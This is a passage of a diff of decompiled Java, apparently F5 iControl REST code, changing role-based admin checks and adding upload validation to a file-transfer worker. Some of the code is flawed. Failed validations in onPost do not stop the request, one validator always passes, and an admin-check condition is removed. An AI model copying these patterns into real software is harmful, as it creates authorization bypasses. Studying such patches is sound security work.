return;\n }\n \n 
completeRequest(incomingRequest);\n }\n \n private void updateLocalRolesWorker(final RestOperation incomingRequest, RolesWorkerState role) {\n final Set<URI> localAdminUris = collectLocalUserUris(role);\n TmosLocalRolesWorkerState update = new TmosLocalRolesWorkerState();\n \n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation response)\n {\n Set<URI> remainingLocalAdminUris = new HashSet<>(localAdminUris);\n \n for (Map.Entry<URI, Boolean> entry : RolesWorker.this.tmosRoleCache.getValues().entrySet()) {\n if (entry.getValue() != Boolean.TRUE) {\n continue;\n }\n \n if (!RolesWorker.isLocalUserReference(new RestReference(entry.getKey()))) {\n continue;\n }\n \n \n if (!remainingLocalAdminUris.remove(entry.getKey())) {\n RolesWorker.this.tmosRoleCache.putValue(entry.getKey(), Boolean.FALSE);\n }\n }\n \n for (URI adminUri : remainingLocalAdminUris) {\n RolesWorker.this.tmosRoleCache.putValue(adminUri, Boolean.TRUE);\n }\n \n RolesWorker.this.completeRequest(incomingRequest);\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n RolesWorker.this.getLogger().fineFmt(\"Unable to update list of admins: %s\", new Object[] { ex.getMessage() });\n \n incomingRequest.fail(ex);\n }\n };\n \n \n for (URI adminUserRef : localAdminUris) {\n update.administrators.add(UrlHelper.getLastPathSegment(adminUserRef.getPath()));\n }\n \n if (AuthzHelper.DEFAULT_ADMIN_NAME != null) {\n if (!update.administrators.contains(AuthzHelper.DEFAULT_ADMIN_NAME)) {\n update.administrators.add(AuthzHelper.DEFAULT_ADMIN_NAME);\n \n \n role.userReferences.add(AuthzHelper.getDefaultAdminReference());\n }\n incomingRequest.setBody(role);\n }\n \n RestOperation request = RestOperation.create().setUri(makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH)).setAdminIdentity().setBody(update).setCompletion(completion);\n \n \n \n \n \n sendPost(request);\n }\n \n private static Set<URI> collectLocalUserUris(RolesWorkerState roleState) 
{\n Set<URI> userUris = new HashSet<>();\n for (RestReference userReference : roleState.userReferences) {\n if (RestReference.isNullOrEmpty(userReference)) {\n continue;\n }\n \n \n \n if (!isLocalUserReference(userReference)) {\n continue;\n }\n userUris.add(userReference.link);\n }\n return userUris;\n }\n \n private static boolean isLocalUserReference(RestReference userReference) {\n return userReference.link.getPath().startsWith(LOCAL_USERS_PATH);\n }\n \n \n public void onPutCompleted(RestOperation request) {\n RolesWorkerState putState = (RolesWorkerState)getStateFromRequest(request);\n addRole(putState);\n request.complete();\n }\n \n \n \n \n \n \n private void addRole(RolesWorkerState postedItem) {\n synchronized (this.userLinkToRoleNames) {\n \n \n \n this.roleNameToResources.put(postedItem.name, buildResourcesList(postedItem));\n \n \n \n if (postedItem.userReferences != null) {\n addRolesToUsers(postedItem.name, postedItem.userReferences);\n }\n if (postedItem.resourceGroupReferences != null) {\n addRolesToResourceGroups(postedItem.name, postedItem.resourceGroupReferences);\n }\n \n \n for (Map.Entry<RestReference, Set<String>> entry : this.userLinkToRoleNames.entrySet()) {\n \n if (((Set)entry.getValue()).contains(postedItem.name) && (postedItem.userReferences == null || !postedItem.userReferences.contains(entry.getKey())))\n {\n \n ((Set)entry.getValue()).remove(postedItem.name);\n }\n }\n \n for (Map.Entry<RestReference, Set<String>> entry : this.resourceGroupToRoleNames.entrySet()) {\n \n if (((Set)entry.getValue()).contains(postedItem.name) && (postedItem.resourceGroupReferences == null || !postedItem.resourceGroupReferences.contains(entry.getKey())))\n {\n \n ((Set)entry.getValue()).remove(postedItem.name);\n }\n }\n }\n }\n \n \n \n private void addRolesToUsers(String roleName, Set<RestReference> users) {\n for (RestReference userReference : users) {\n if (userReference.link == null) {\n getLogger().warningFmt(\"Null userReference in role %s\", 
new Object[] { roleName });\n continue;\n }\n getLogger().finestFmt(\"Adding role %s from %s\", new Object[] { roleName, userReference.link.toString() });\n \n if (this.userLinkToRoleNames.containsKey(userReference)) {\n ((Set<String>)this.userLinkToRoleNames.get(userReference)).add(roleName);\n continue;\n }\n Set<String> roleSet = new HashSet<>();\n roleSet.add(roleName);\n this.userLinkToRoleNames.put(userReference, roleSet);\n }\n }\n \n \n \n \n private void addRolesToResourceGroups(String roleName, Set<RestReference> resourceGroups) {\n for (RestReference resourceGroup : resourceGroups) {\n if (resourceGroup.link == null) {\n getLogger().warningFmt(\"Null userReference in role %s\", new Object[] { roleName });\n continue;\n }\n getLogger().finestFmt(\"Adding role %s to %s\", new Object[] { roleName, resourceGroup.link.toString() });\n \n if (this.resourceGroupToRoleNames.containsKey(resourceGroup)) {\n ((Set<String>)this.resourceGroupToRoleNames.get(resourceGroup)).add(roleName);\n continue;\n }\n Set<String> roleSet = new HashSet<>();\n roleSet.add(roleName);\n this.resourceGroupToRoleNames.put(resourceGroup, roleSet);\n }\n }\n \n \n \n private void removeRolesFromUsers(String roleName, Set<RestReference> users) {\n for (RestReference userReference : users) {\n if (userReference.link == null) {\n continue;\n }\n if (this.userLinkToRoleNames.containsKey(userReference)) {\n getLogger().finestFmt(\"Removing role %s from %s\", new Object[] { roleName, userReference.link.toString() });\n \n ((Set)this.userLinkToRoleNames.get(userReference)).remove(roleName);\n }\n }\n }\n \n \n \n \n private void removeRolesFromResourceGroups(String roleName, Set<RestReference> resourceGroups) {\n for (RestReference groupReference : resourceGroups) {\n if (groupReference.link == null) {\n continue;\n }\n if (this.resourceGroupToRoleNames.containsKey(groupReference)) {\n getLogger().finestFmt(\"Removing role %s from %s\", new Object[] { roleName, groupReference.link.toString() 
});\n \n ((Set)this.resourceGroupToRoleNames.get(groupReference)).remove(roleName);\n }\n }\n }\n \n \n \n public void onDelete(RestOperation request) {\n getLogger().fineFmt(\"Attempting to DELETE role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n completeDelete(request);\n }\n \n \n public void onDeleteCompleted(RestOperation request) {\n RolesWorkerState item = (RolesWorkerState)getStateFromRequest(request);\n \n synchronized (this.userLinkToRoleNames) {\n if (item.userReferences != null) {\n removeRolesFromUsers(item.name, item.userReferences);\n }\n \n \n if (item.resourceGroupReferences != null) {\n removeRolesFromResourceGroups(item.name, item.resourceGroupReferences);\n }\n \n this.roleNameToResources.remove(item.name);\n }\n \n request.complete();\n }\n \n \n \n \n \n \n public void onPost(RestOperation request) {\n getLogger().fineFmt(\"Attempting to POST role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n updateBuiltInRoleCacheOnDemand(request);\n }\n \n \n public void onPostCompleted(RestOperation request) {\n RolesWorkerState postedItem = (RolesWorkerState)getStateFromRequest(request);\n addRole(postedItem);\n request.complete();\n }\n \n \n \n \n \n \n \n private boolean isReadOnly(RestOperation request) {\n if (!isExternalRequest(request)) {\n return false;\n }\n \n RolesWorkerState updateState = getStateToUpdate(request);\n if (request.getMethod().equals(RestOperation.RestMethod.DELETE) && (updateState.name.equals(\"iControl_REST_API_User\") || updateState.name.equals(\"Administrator\"))) {\n \n \n \n request.fail(new IllegalStateException(String.format(\"Cannot %s built in roles.\", new Object[] { \"delete\" })));\n \n return true;\n }\n \n return false;\n }\n \n \n \n \n \n \n \n private static boolean isExternalRequest(RestOperation request) {\n return (request.getReferer() != null && 
!request.getReferer().endsWith(TmosBuiltInRolesWorkerState.WORKER_PATH) && !request.getReferer().contains(RemoteStateCopier.class.getName()) && !request.getReferer().contains(\"shared/gossip\") && !request.getReferer().endsWith(WellKnownPorts.AUTHZ_TMOS_ROLES_SYNC_WORKER_URI_PATH));\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void evaluatePermission(final RestOperation request, final String path, final RestOperation.RestMethod verb, final CompletionHandler<Boolean> completion) {\n if (isAllowedToAll(path, verb)) {\n completion.completed(Boolean.valueOf(true));\n \n return;\n }\n hasAdminRole(request, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n completion.completed(Boolean.valueOf(true));\n \n return;\n }\n completion.completed(Boolean.valueOf(RolesWorker.this.evaluatePermission(request, path, verb)));\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n completion.failed(ex, Boolean.valueOf(false));\n }\n });\n }\n \n \n \n \n private static boolean isAllowedToAll(String path, RestOperation.RestMethod verb) {\n if (verb == RestOperation.RestMethod.POST && (path.equals(EXTERNAL_EFFECTIVE_PERMISSIONS_WORKER_PATH) || path.startsWith(EXTERNAL_LOGIN_WORKER_PATH)))\n {\n \n return true;\n }\n \n \n \n \n if (verb == RestOperation.RestMethod.GET && (path.startsWith(EXTERNAL_ROLES_WORKER_URI_PATH) || path.startsWith(EXTERNAL_RESOURCE_GROUPS_WORKER_URI_PATH)))\n {\n \n return true;\n }\n \n return false;\n }\n \n \n private boolean evaluatePermission(RestOperation request, String path, RestOperation.RestMethod verb) {\n for (RestReference identityReference : request.getAuthIdentityReferences()) {\n if (evaluatePermission(identityReference, path, verb)) {\n return true;\n }\n }\n \n return false;\n }\n \n \n private boolean evaluatePermission(RestReference userLink, String path, RestOperation.RestMethod verb) {\n if 
(path.equals(userLink.link.getPath())) {\n return true;\n }\n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n \n synchronized (this.userLinkToRoleNames) {\n \n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n \n for (String roleName : this.userLinkToRoleNames.get(userLink)) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n if (resources.verifyResourceIsPermitted(path, verb)) {\n return true;\n }\n }\n }\n return false;\n }\n \n public void hasAdminRole(RestOperation request, CompletionHandler<Boolean> completion) {\n for (RestReference groupReference : request.getAuthGroupReferencesList()) {\n if (hasAdminRoleFromGroup(groupReference)) {\n completion.completed(Boolean.valueOf(true));\n return;\n }\n }\n RestReference authUserReference = request.getAuthUserReference();\n if (RestReference.isNullOrEmpty(authUserReference)) {\n completion.completed(null);\n return;\n }\n - if (!hasAdminRoleFromGroup(authUserReference)) {\n - completion.completed(null);\n - return;\n - }\n this.tmosRoleCache.get(authUserReference.link, completion);\n }\n \n private boolean hasAdminRoleFromGroup(RestReference userLink) {\n if (!this.userLinkToRoleNames.containsKey(userLink)) {\n return false;\n }\n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.userLinkToRoleNames.get(userLink);\n return (roleNames != null && roleNames.contains(\"Administrator\"));\n }\n }\n \n private RoleResourceMatcher buildResourcesList(RolesWorkerState role) {\n Set<RoleResource> resources = new HashSet<>();\n \n if (role.resources != null) {\n resources.addAll(role.resources);\n }\n \n if (role.resourceGroupReferences != null) {\n for (RestReference resourceGroupReference : role.resourceGroupReferences) {\n if (RestReference.isNullOrEmpty(resourceGroupReference)) {\n continue;\n }\n Set<RoleResource> groupResources = 
this.resourcesGroupWorker.getRoleResourcesFromGroup(resourceGroupReference.link);\n \n if (groupResources != null) {\n resources.addAll(groupResources);\n }\n }\n }\n \n return new RoleResourceMatcher(resources);\n }\n \n \n \n private void queueUserRemoval(RestReference userReference) {\n getLogger().fineFmt(\"Queued removal of %s from roles.\", new Object[] { userReference.link });\n \n synchronized (this.userLinkToRoleNames) {\n if (!this.userLinkToRoleNames.containsKey(userReference)) {\n return;\n }\n }\n \n this.usersToRemove.add(userReference);\n processUserRemovalQueue();\n }\n \n \n private void completedUserRemoval() {\n this.isUserRemovalRunning.set(false);\n processUserRemovalQueue();\n }\n \n private void processUserRemovalQueue() {\n if (this.isUserRemovalRunning.compareAndSet(false, true)) {\n removeNextUser();\n }\n }\n \n private void removeNextUser() {\n RestReference userRef = this.usersToRemove.poll();\n \n if (userRef == null) {\n this.isUserRemovalRunning.set(false);\n \n return;\n }\n getLogger().fineFmt(\"Processing %s for removal from roles\", new Object[] { userRef.link });\n \n Set<String> roles = null;\n \n synchronized (this.userLinkToRoleNames) {\n if (this.userLinkToRoleNames.containsKey(userRef)) {\n roles = new HashSet<>(this.userLinkToRoleNames.get(userRef));\n }\n }\n \n if (roles == null || roles.isEmpty()) {\n completedUserRemoval();\n \n return;\n }\n for (String role : roles) {\n removeUserFromRole(userRef, role);\n }\n }\n \n \n private void removeUserFromRole(final RestReference userReference, final String roleName) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().fineFmt(\"Unable to GET %s to remove %s: %s\", new Object[] { this.val$roleName, this.val$userReference.link.toString(), ex });\n \n RolesWorker.this.completedUserRemoval();\n }\n \n \n public void completed(RestOperation operation) {\n 
final RolesWorkerState role = (RolesWorkerState)operation.getTypedBody(RolesWorkerState.class);\n if (!role.userReferences.remove(userReference) && !\"Administrator\".equals(roleName)) {\n \n RolesWorker.this.completedUserRemoval();\n return;\n }\n RestRequestCompletion putCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation putResponse)\n {\n if (putResponse.getStatusCode() == 404) {\n RolesWorker.this.completedUserRemoval();\n \n return;\n }\n RolesWorker.this.getLogger().fineFmt(\"Unable to update %s to remove %s, will retry. Error: %s\", new Object[] { this.val$role.name, this.this$1.val$userReference.link.toString(), ex });\n \n \n \n RolesWorker.this.queueUserRemoval(userReference);\n }\n \n \n \n public void completed(RestOperation putResponse) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully removed %s from role %s\", new Object[] { this.this$1.val$userReference.link.toString(), this.val$role.name });\n \n RolesWorker.this.completedUserRemoval();\n }\n };\n \n \n RestOperation put = RestOperation.create().setUri(UrlHelper.extendUriSafe(RolesWorker.this.getUri(), new String[] { this.val$roleName })).setBody(role).setCompletion(putCompletion);\n \n \n \n RolesWorker.this.sendPut(put);\n }\n };\n \n RestOperation get = RestOperation.create().setUri(UrlHelper.extendUriSafe(getUri(), new String[] { roleName })).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n void removeResourceGroupsFromRoles(RestReference groupReference) {\n Set<String> roles = null;\n \n synchronized (this.userLinkToRoleNames) {\n if (this.resourceGroupToRoleNames.containsKey(groupReference)) {\n roles = new HashSet<>(this.resourceGroupToRoleNames.get(groupReference));\n }\n }\n \n if (roles == null) {\n return;\n }\n \n for (String role : roles) {\n removeResourceGroupFromRole(groupReference, role, 10);\n }\n }\n \n \n \n void removeResourceGroupFromRole(final RestReference groupReference, final String roleName, final int 
retries) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().fineFmt(\"Failed to remove %s from role %s: %s\", new Object[] { this.val$groupReference.link.toString(), this.val$roleName, ex });\n }\n \n \n \n public void completed(RestOperation operation) {\n final RolesWorkerState role = (RolesWorkerState)operation.getTypedBody(RolesWorkerState.class);\n if (!role.resourceGroupReferences.remove(groupReference)) {\n return;\n }\n RestRequestCompletion putCompletion = new RestRequestCompletion()\n {\n \n \n \n public void failed(Exception ex, RestOperation putResponse)\n {\n if (retries <= 0) {\n RolesWorker.this.getLogger().warningFmt(\"Failed to remove %s from role %s: %s\", new Object[] { this.this$1.val$groupReference.link.toString(), this.val$role.name, ex });\n \n return;\n }\n TimerTask task = new TimerTask()\n {\n public void run()\n {\n RolesWorker.this.removeResourceGroupFromRole(groupReference, roleName, retries - 1);\n }\n };\n \n \n \n RolesWorker.this.scheduleTask(task, true, (10 - retries) * 10, 0, 1);\n }\n \n \n public void completed(RestOperation putResponse) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully removed %s from role %s\", new Object[] { this.this$1.val$groupReference.link.toString(), this.val$role.name });\n }\n };\n \n \n \n RestOperation put = RestOperation.create().setUri(UrlHelper.extendUriSafe(RolesWorker.this.getUri(), new String[] { this.val$roleName })).setBody(role).setCompletion(putCompletion);\n \n \n \n RolesWorker.this.sendPut(put);\n }\n };\n \n RestOperation get = RestOperation.create().setUri(UrlHelper.extendUriSafe(getUri(), new String[] { roleName })).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n \n void rebuildRolesWithRef(final URI resourceGroupSelfLink, final RestOperation groupRequest) {\n RestRequestCompletion getCollectionCompletion = new RestRequestCompletion()\n {\n 
public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to rebuild role resources: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesCollectionState collection = (RolesCollectionState)operation.getTypedBody(RolesCollectionState.class);\n \n \n RestReference resourceGroup = new RestReference(resourceGroupSelfLink);\n RolesWorker.this.rebuildResources(collection, resourceGroup);\n RolesWorker.this.resourcesGroupWorker.onRoleRebuildComplete(groupRequest);\n }\n };\n \n \n loadChildValues(getCollectionCompletion);\n }\n \n \n \n \n \n \n \n void rebuildAllRoles() {\n RestRequestCompletion getCollectionCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to rebuild role resources: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesCollectionState collection = (RolesCollectionState)operation.getTypedBody(RolesCollectionState.class);\n \n synchronized (RolesWorker.this.userLinkToRoleNames) {\n for (RolesWorkerState role : collection.items) {\n RolesWorker.this.roleNameToResources.put(role.name, RolesWorker.this.buildResourcesList(role));\n }\n }\n }\n };\n \n \n loadChildValues(getCollectionCompletion);\n }\n \n \n void rebuildResources(RolesCollectionState collection, RestReference resourceGroup) {\n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.resourceGroupToRoleNames.get(resourceGroup);\n if (roleNames == null) {\n return;\n }\n \n for (RolesWorkerState role : collection.items) {\n if (roleNames.contains(role.name)) {\n this.roleNameToResources.put(role.name, buildResourcesList(role));\n }\n }\n }\n }\n \n \n public static void failWithPermissionsInternalError(RestOperation request) {\n request.setBody(null);\n 
request.setStatusCode(500);\n request.fail(new Exception(\"Internal server error while authorizing request\"));\n }\n \n public void invalidateCacheForUser(URI userSelfLink) {\n this.tmosRoleCache.invalidate(userSelfLink);\n }\n }\n diff --git a/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java b/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java\n new file mode 100644\n index 0000000..99c2bd4\n --- /dev/null\n +++ b/com/f5/rest/workers/asm/AsmFileTransferConfiguration.java\n @@ -0,0 +1,26 @@\n +package com.f5.rest.workers.asm;\n +\n +import java.util.ArrayList;\n +import java.util.List;\n +\n +public class AsmFileTransferConfiguration\n +{\n + List<String> allowedFileFormat = new ArrayList<>();\n +\n + public List<String> getAllowedFileFormat() {\n + return this.allowedFileFormat;\n + }\n +\n + public void setAllowedFileFormat(List<String> paramList) {\n + this.allowedFileFormat = paramList;\n + }\n +\n + public String getAllowedFileFormatAsString(String paramString) {\n + StringBuilder stringBuilder = new StringBuilder();\n + for (String str : this.allowedFileFormat) {\n + stringBuilder.append(str).append(paramString);\n + }\n + stringBuilder.deleteCharAt(stringBuilder.lastIndexOf(paramString));\n + return stringBuilder.toString();\n + }\n +}\n diff --git a/com/f5/rest/workers/asm/AsmFileTransferWorker.java b/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n index 87e0610..16144f9 100644\n --- a/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n +++ b/com/f5/rest/workers/asm/AsmFileTransferWorker.java\n 
@@ -1,133 +1,162 @@\n package com.f5.rest.workers.asm;\n \n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.UrlHelper;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n +import com.f5.rest.workers.asm.utils.AsmRequestValidator;\n +import com.f5.rest.workers.asm.utils.ValidationResponse;\n import java.net.URI;\n import java.util.ArrayList;\n import java.util.List;\n +import java.util.logging.Logger;\n \n \n \n public class AsmFileTransferWorker\n extends RestWorker\n {\n + private final Logger LOGGER = Logger.getLogger(AsmFileTransferWorker.class.getSimpleName());\n private String postDirectory;\n private String tmpDirectory;\n private String getDirectory;\n private final String PRIVATE_SUFFIX = \"-private\";\n private boolean isDownload;\n private String localUri;\n \n public AsmFileTransferWorker(String paramString1, String paramString2, String paramString3) throws Exception {\n this.postDirectory = paramString2;\n this.tmpDirectory = paramString3;\n this.isDownload = false;\n this.localUri = paramString1;\n }\n \n public AsmFileTransferWorker(String paramString1, String paramString2) throws Exception {\n this.getDirectory = paramString2;\n this.isDownload = true;\n this.localUri = paramString1;\n }\n \n \n \n public void onStart(RestServer paramRestServer) throws Exception {\n if (this.isDownload) {\n \n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.getDirectory);\n - fileTransferWorker.setPublic(false);\n - getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferWorker);\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.getDirectory);\n + fileTransferPrivateWorker.setPublic(false);\n + getServer().registerWorker(this.localUri + \"-private\", 
(RestWorker)fileTransferPrivateWorker);\n }\n else {\n \n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.postDirectory, this.tmpDirectory);\n - fileTransferWorker.setPublic(false);\n - getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferWorker);\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.postDirectory, this.tmpDirectory);\n + fileTransferPrivateWorker.setPublic(false);\n + getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferPrivateWorker);\n }\n \n ArrayList<String> arrayList = new ArrayList();\n arrayList.add(\"/*\");\n getServer().registerCollectionWorker(arrayList, this);\n registerPublicUri(getUri().getPath(), null);\n \n super.onStart(paramRestServer);\n }\n \n \n protected void forwardRequest(final RestOperation request) {\n List list = request.getParsedCollectionEntries();\n RestOperation restOperation = (RestOperation)request.clone();\n \n +\n URI uRI = getUri();\n try {\n if (list == null || list.size() == 0) {\n uRI = UrlHelper.buildLocalUri(getServer(), new String[] { this.localUri + \"-private\" });\n } else {\n \n String str1 = request.getAuthUser();\n String str2 = str1 + \"~\" + ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n uRI = UrlHelper.buildLocalUri(getServer(), new String[] { this.localUri + \"-private\", \"/\", str2 });\n }\n \n } catch (Exception exception) {}\n \n \n restOperation.setUri(uRI).setCompletion(new RestRequestCompletion()\n {\n public void completed(RestOperation param1RestOperation) {\n String str = param1RestOperation.getBodyAsString();\n if (str == null || str.isEmpty()) {\n request.setBinaryBody(param1RestOperation.getBinaryBody());\n } else {\n \n request.setBody(str);\n }\n \n request.complete();\n }\n \n \n public void failed(Exception param1Exception, RestOperation param1RestOperation) {\n request.fail(param1Exception);\n }\n });\n sendRequest(restOperation);\n }\n \n \n \n 
protected void onGet(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onQuery(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPost(RestOperation paramRestOperation) {\n + this.LOGGER.info(\"Validating the request\");\n + ValidationResponse validationResponse1 = validateRequest(paramRestOperation);\n + if (!validationResponse1.isValid()) {\n + paramRestOperation.setStatusCode(401);\n + paramRestOperation.fail(new SecurityException(validationResponse1.getMessage()));\n + }\n + ValidationResponse validationResponse2 = AsmRequestValidator.validateFileExtension(paramRestOperation);\n + if (!validationResponse2.isValid()) {\n + paramRestOperation.fail(new IllegalArgumentException(validationResponse2.getMessage()));\n + }\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onDelete(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPatch(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPut(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n +\n + private ValidationResponse validateRequest(RestOperation paramRestOperation) {\n + ValidationResponse validationResponse = AsmRequestValidator.validateUserAuthorization(paramRestOperation);\n + if (!validationResponse.isValid()) {\n +\n + ValidationResponse validationResponse1 = AsmRequestValidator.validateUserHasFullAuthorization(paramRestOperation);\n + if (!validationResponse1.isValid()) {\n + return validationResponse;\n + }\n + return new ValidationResponse(true);\n + }\n +\n + return validationResponse;\n + }\n }\n diff --git a/com/f5/rest/workers/asm/utils/AsmRequestValidator.java b/com/f5/rest/workers/asm/utils/AsmRequestValidator.java\n new file mode 100644\n index 0000000..6f80b68\n --- /dev/null\n +++ b/com/f5/rest/workers/asm/utils/AsmRequestValidator.java\n 
@@ -0,0 +1,119 @@\n +package com.f5.rest.workers.asm.utils;\n +\n +import com.f5.mcp.data.DataObject;\n +import com.f5.mcp.io.Connection;\n +import com.f5.mcp.io.ConnectionManager;\n +import com.f5.mcp.io.ObjectManager;\n +import com.f5.mcp.schema.SchemaAttribute;\n +import com.f5.mcp.schema.SchemaStructured;\n +import com.f5.mcp.schema.auth.AuthModule;\n +import com.f5.mcp.schema.auth.UserRolePartition;\n +import com.f5.mcp.schema.common.McpUserRoleT;\n +import com.f5.rest.common.RestOperation;\n +import com.f5.rest.workers.asm.AsmFileTransferConfiguration;\n +import com.f5.rest.workers.filemanagement.FileManagementHelper;\n +import com.google.gson.Gson;\n +import java.io.BufferedReader;\n +import java.io.File;\n +import java.io.FileNotFoundException;\n +import java.io.FileReader;\n +import java.util.ArrayList;\n +import java.util.Arrays;\n +import java.util.List;\n +import java.util.logging.Logger;\n +import java.util.regex.Pattern;\n +\n +\n +\n +\n +\n +public class AsmRequestValidator\n +{\n + private static final Logger LOGGER = Logger.getLogger(AsmRequestValidator.class.getName());\n + private static final String MCP_PARTITION_ALL = \"[All]\";\n + private static final String MCP_PARTITION_COMMON = \"Common\";\n + private static final ArrayList<McpUserRoleT> allowedRoles = new ArrayList<>(Arrays.asList(new McpUserRoleT[] { McpUserRoleT.ROLE_APPLICATION_SECURITY_ADMINISTRATOR, McpUserRoleT.ROLE_APPLICATION_SECURITY_OPERATIONS_ADMINISTRATOR, McpUserRoleT.ROLE_RESOURCE_ADMIN, McpUserRoleT.ROLE_ADMINISTRATOR, McpUserRoleT.ROLE_APPLICATION_SECURITY_EDITOR }));\n +\n +\n +\n +\n +\n + private static String ALLOWED_FILE_FORMATS_CONFIG = \"/etc/asm-file-transfer-config.json\";\n + private static String FILE_REGEX;\n +\n + static {\n + try {\n + File file = new File(ALLOWED_FILE_FORMATS_CONFIG);\n + BufferedReader bufferedReader = new BufferedReader(new FileReader(file));\n + AsmFileTransferConfiguration asmFileTransferConfiguration = 
(AsmFileTransferConfiguration)(new Gson()).fromJson(bufferedReader, AsmFileTransferConfiguration.class);\n + String str = asmFileTransferConfiguration.getAllowedFileFormatAsString(\"|\");\n + FILE_REGEX = \"^[a-zA-Z0-9_. -~\\\\(\\\\)\\\\%]+\\\\.(\" + str + \")\";\n + } catch (FileNotFoundException fileNotFoundException) {\n + LOGGER.severe(\"FILE REGEX validator was not calculated:\" + fileNotFoundException.getMessage());\n + }\n + }\n +\n + public static ValidationResponse validateUserAuthorization(RestOperation paramRestOperation) {\n + String str = paramRestOperation.getAuthUser();\n + if (str == null) {\n + return new ValidationResponse(false, \"Could not get the authorized username for this incoming request\");\n + }\n +\n + boolean bool = (str.equals(\"admin\") || str.equals(\"root\")) ? true : false;\n + return new ValidationResponse(bool, String.format(\"User '%s' is not authorized\", new Object[] { str }));\n + }\n +\n + public static ValidationResponse validateUserHasFullAuthorization(RestOperation paramRestOperation) {\n + ConnectionManager connectionManager = ConnectionManager.instance();\n + if (connectionManager == null) {\n + ConnectionManager.init();\n + connectionManager = ConnectionManager.instance();\n + }\n + Connection connection = null;\n + try {\n + connection = connectionManager.getConnection();\n + ObjectManager objectManager = new ObjectManager((SchemaStructured)AuthModule.UserRolePartition, connection);\n + DataObject dataObject = objectManager.newObject();\n + dataObject.put((SchemaAttribute)UserRolePartition.USER, paramRestOperation.getAuthUser());\n + DataObject[] arrayOfDataObject = objectManager.getAll(dataObject);\n + if (arrayOfDataObject != null) {\n + for (DataObject dataObject1 : arrayOfDataObject) {\n + String str = dataObject1.getString((SchemaAttribute)UserRolePartition.PARTITION);\n + if (str.equals(\"[All]\") || str.equals(\"Common\")) {\n + McpUserRoleT mcpUserRoleT = 
(McpUserRoleT)dataObject1.getToken((SchemaAttribute)UserRolePartition.ROLE);\n + if (allowedRoles.contains(mcpUserRoleT)) {\n + return new ValidationResponse(true);\n + }\n + }\n + }\n + }\n + } catch (Exception exception) {\n + return new ValidationResponse(false, exception.getMessage());\n + } finally {\n + if (connection != null) {\n + connectionManager.freeConnection(connection);\n + }\n + }\n + return new ValidationResponse(false);\n + }\n +\n + public static ValidationResponse validateFileExtension(RestOperation paramRestOperation) {\n + List list = paramRestOperation.getParsedCollectionEntries();\n + if (list == null || list.isEmpty()) {\n + return new ValidationResponse(true);\n + }\n +\n + String str = ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n + if (!Pattern.matches(FILE_REGEX, str)) {\n + FileManagementHelper.cleanPostForResponse(paramRestOperation);\n + paramRestOperation.fail(new IllegalArgumentException(\"A valid file format must be supplied\"));\n + return new ValidationResponse(false, \"A valid file format must be supplied\");\n + }\n + return new ValidationResponse(true);\n + }\n +\n + public static ValidationResponse validateRequestSource(RestOperation paramRestOperation) {\n + LOGGER.info(paramRestOperation.getUri().toString());\n + return new ValidationResponse(true);\n + }\n +}\n diff --git a/com/f5/rest/workers/asm/utils/ValidationResponse.java b/com/f5/rest/workers/asm/utils/ValidationResponse.java\n new file mode 100644\n index 0000000..109fa81\n --- /dev/null\n +++ 